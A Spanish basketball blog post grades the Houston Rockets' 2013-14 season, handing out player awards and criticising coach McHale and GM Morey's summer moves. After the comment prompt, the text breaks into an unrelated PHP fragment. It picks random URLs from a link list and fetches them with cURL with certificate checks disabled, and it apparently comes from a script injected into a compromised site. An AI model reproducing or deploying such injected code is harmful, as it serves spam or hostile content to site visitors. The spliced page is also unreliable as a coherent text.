Houston Rockets: Aprobado raspado

28 de July de 2014 por Simon

Hemos tenido muchas dudas a la hora de calificar la temporada de los Rockets y es posible que muchos de vosotros no estéis para nada de acuerdo. Ya por octubre  del año pasado señalábamos que a pesar de incorporar a Dwight Howard la plantilla resultaba algo corta de variantes y que su techo no iba a ser tan alto como mucha gente preveía. No queremos ponernos estrellitas pero esta vez acertamos de pleno el pronóstico: fueron cuartos del Oeste con apenas un par de victorias más de las que apostábamos pero se fueron a la calle a las primeras de cambio cuando llegaron las eliminatorias por el título. Si han recibido el aprobado estos Rockets es única y exclusivamente porque han hecho lo que esperábamos de ellos a principio de temporada, aunque por plantilla deberían haber aspirado a algo más.

Houston fue un año más uno de los equipos más anotadores de la liga sólo superados por los Clippers de Doc Rivers. El gran problema estuvo atrás. Se han pasado la temporada recibiendo más puntos de los que debían algo que se puede sobrellevar en liga regular pero que te entierra en playoffs . Un equipo que aspira al anillo confiando todo a la inspiración de cara al aro de sus cracks tiene un enorme punto débil: el día que no entran la derrota es segura como demuestra que en sus derrotas no llegaran a los 100 puntos por partido mientras que en sus victorias superaran holgadamente los 110 de promedio. Es decir, estos Rockets eran incapaces de ganar un partido en el cuál todas sus piezas no rindieran al máximo en ataque. 

Los Rockets comenzaron la campaña como un tiro. Parecían un verdadero aspirante al anillo gracias a la adquisición de Dwight Howard, el grandísimo rendimiento de los secundarios Chandler Parsons y Terrence Jones. y el enorme rendimiento ofensivo de James Harden.  Sin embargó, el mes de diciembre sembró las primeras dudas en el proyecto. El equipo no encontraba la misma inspiración ofensiva que durante los primeros días de competición y eso se notó en los resultados. Con el año nuevo los resultados mejoraron pero las dudas se iban acrecentando. Cada vez que un equipo le planteaba a los de McHale un partido con aroma a play off éstos caían.

Con este defecto tan marcado llegaron a unos playoffs en los que eran favoritos para superar la primera ronda dado que se enfrentaban a un equipo con virtudes y defectos muy parecidos a los suyos, los jóvenes Blazers. La eliminatoria se jugó a un ritmo inusualmente alto para estar en postemporada con anotaciones escandalosas y finales de infarto con varias prórrogas incluidas, algo que en principio debía benficiar mucho a los Rockets. Sin embargo, en los minutos finales de los partidos Lillard y Aldridge se comieron a Harden y Howard, supuestamente más curtidos y experimentados, y fueron los Blazers los que se acabaron llevando el gato al agua. Si un equipo tan “nuevo” como los Blazers les había acabado superando, ¿qué habría pasado ante un equipo mucho más hecho?

El devenir de la temporada ha dejado tocados a los Rockets en general y a su gran estrella en particular. Harden, el hombre destinado a ser el alma de este equipo, se vio superado por las circunstancias y no brilló cuando su equipo más lo necesitaba. Lo peor es que no es la primera vez que le pasa. Howard por su parte recuperó durante muchos tramos de la temporada ese nivel que, aún con sus torpes movimientos y escasa capacidad técnica, le convierte en el jugador más influyente de la liga en su posición. El problema es que no parece estar en el mejor sitio para desarrollar su baloncesto y muchas veces se pierde entre el vertiginoso ritmo de juego que imponen sus compañeros.

PREMIOS

MVP: James Harden (25’4p – 4’7r – 6’1a) aunque hemos dudalo hasta última hora entre él y Dwight Howard. El escolta ha sido el mejor jugador del equipo durante la mayor parte del campeonato y un año más ha demostrado ser uno de los mejores jugadores ofensivos de la liga. ¿El problema? Que en los Play Off no aportó lo que se esperaba de él. Muchos puntos, sí, pero porcentajes bajos y un buen número de decisiones cuestionables.

Rookie: Este año no había sitio para rookies en Houston. Apenas Canaan o Covington han tenido algún minuto esporádico insuficiente para calificar para bien o mal.

Sorpresa: En su año rookie ya apuntaba a que podía ser un jugador importante en esta plantilla. En nuestro análisis ya apuntábamos que iba a marcar el techo de los Rockets. Terrence Jones no es una estrella ni probablemente lo será nunca pero este año se ha destapado como un jugador con un gran nivel capaz de aportar en muchos apartados. Mucho futuro aquí.

Decepción: Este premio no se lo lleva ningún jugador. La decepción de este año en Houston para mí son a partes iguales Kevin McHale y Daryl Morey.  El entrenador no ha sido capaz de dar al equipo ni una pizca de rigor defensivo, apenas ha mostrado alternativas en ataque y en muchas fases de la campaña tampoco fueron capaces de encontrar a su perro grande. Suspenso para McHale y una gran decepción personal pues lo tenía como un entrenador mucho más capaz. El otro gran suspenso es para Morey. En mi análisis previo todo eran halagos pero este año no ha sabido manejar la situación. Ya hemos explicado más arriba todas las razones que nos llevan a suspenderlo rotundamente.

Esfuerzo en vano: Dwight Howard (18’3p – 12.2r- 1’8t). Esta temporada ha recuperado parte del aura que tenía en Orlando. Por momentos ha recuperado su mejor nivel y ha dado muestras de que a tope físicamente sigue siendo un jugador determinante a pesar de su escasez de fundamentos. Además ha luchado gran parte de la temporada contra su propio equipo que a veces se olvidaba que lo tenía ahí debajo del aro. Sin duda mucho mérito la temporada de Howard en un equipo y un esquema que no se han adaptado a él.

 JUGANDO A GM

Escribimos el análisis hace un tiempo y viendo el devenir de los acontecimientos hemos tenido que reescribir totalmente esta sección. Nuestra idea principal pasaba por incorporar a Chris Bosh desde la agencia libre a la vez que reteníamos a Parsons. También venían en un principio a nuestro equipo jugadores de perfil medio en busca de un remember  de aquellos Magic finalistas como Rashard Lewis y Jamer Nelson por contratos bajos y asumibles pero uno por lesión y otro por ser ja jugador de los Mavs tampoco vendrán. Lin tampoco continuaba en nuestro equipo y curiosamente lo mandábamos a Lakers aunque lo hacía junto a Motiejunas y una ronda a cambio de Xavier Henry Ryan Kelly. Como sustituto de Howard habíamos pensado en Jason Smith y dar una oportunidad a Okafor por el mínimo. El primero ya ha firmado por los Knicks. La renovación de García hubiera sido un hecho también. Fredette también llegaba por el mínimo.

Así nuestra plantilla hubiera sido algo parecido a esto:

Nelson/Beverly/Canaan
Harden/García/Fredette
Parsons/Henry
Bosh/Jones/Kelly
Howard/Okafor/Smith

Como todos sabréis nuestras ideas son ya inviables a estas alturas así que hemos pensado en inventar una nueva sección: “atizar al GM”. La gestión de Daryl Morey este verano merece precisamente eso. Desde mi punto de vista no tiene ningún sentido el rumbo que han tomado los Rockets este verano.

Veamos:

– Lo único destacable que ha llegado es Trevor Ariza, jugador al que personalmente le tengo puesto el asterisco como sospechoso del club del “cazo mix”. Sus temporadas son muy sosas hasta que llega el último año de contrato. Este año será clave para quitarle ese asterisco o confirmar nuestras sospechas. Por cierto, no mejora a Parsons, aunque bien es cierto que cobra la mitad.

– Han salido Parsons, Lin y Asik. Si bien las salidas de estos dos últimos eran necesarias, el precio que han tenido que pagar para quitarse esos contratos ha sido demasiado alto e innecesario. Ambos eran expiring y creemos que merecían algo más a cambio. Se supone que salieron para ganar flexibilidad salarial pero en este momento nos encontramos con estos tres jugadores fuera y con flexibilidad nula.

Por tanto en este verano hemos visto como los Rockets han pasado de ser un equipo joven con dos estrellas contrastadas, una gran flexibilidad salarial y una plantilla relativamente extensa a tener una plantilla corta, sin flexibilidad salarial y con uno de sus jugadores más consistentes fuera a cambio de nada. Si Morey no se inventa algo de aquí al comienzo de la regular season no hay ni una duda de que los Rockets serán el año que viene un equipo con un presente inferior al del año pasado y un futuro mucho peor.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>